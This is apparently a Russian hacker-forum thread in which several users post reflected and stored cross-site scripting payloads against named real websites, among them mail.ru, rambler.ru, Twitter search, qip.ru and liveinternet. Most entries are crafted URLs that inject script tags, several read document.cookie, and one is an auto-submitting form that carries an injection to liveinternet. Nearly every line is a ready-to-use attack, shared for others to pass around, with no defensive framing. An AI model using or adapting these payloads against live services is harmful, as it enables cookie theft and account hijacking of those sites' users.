Пассивные xss на почтовых серверах

Mail.ru

http://voip.agent.mail.ru/cgi-bin/mailrubin.dll/cards.html?inf="><script>alert('BY HACKED Mil-Net')</script>

Нашол сам недавно!
Пускаю по рукам

 

Rambler.ru

http://planeta.rambler.ru/community/icq/?tags=68773422%22%3E%3Cscript%3Ealert(%27BY HACKED Mil-Net%27)%3C/script%3E%3Cnoscript%3E

 

Twitter - не почтовик, но надеюсь меня не побьют:

http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%2339%3B)%3B%2F%2F

И клацаем справа на "Twet the results".

 

Ну тогда я тоже выложу так как не нашол подходящей темы!
Магазин по продаже софта!

http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED+Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8

 

Почта? Почта!
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

 

http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

 

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

 

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

 

Пассивная xss на mail.ru

Code:

https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

 

Повтор!

http://forum.antichat.ru/showpost.php?p=1645042&postcount=86

 

Работает у авторизированных .

http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 

http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E

 

http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);

 

http://mail.am

http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


http://mirtesen.ru
http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&

 

http://www.everyday.com

http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>

 

http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>

 

Очень даже интересно
Особенно в таком виде:

 

Code:

http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>

Code:

http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>

 

liveinternet

liveinternet

PHP:

<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');"> 
              <input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' /> 
              <input class="Hi" type="submit" value="Искать!" />
              </form>    
</body>

 

http://maps.mail.ru

В строке поиска:

Code:

' onMouseOver='alert(1)'>

и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем

Code:

"><img src='.' onerror='alert()'>

И нажимаем "Добавить комментарий"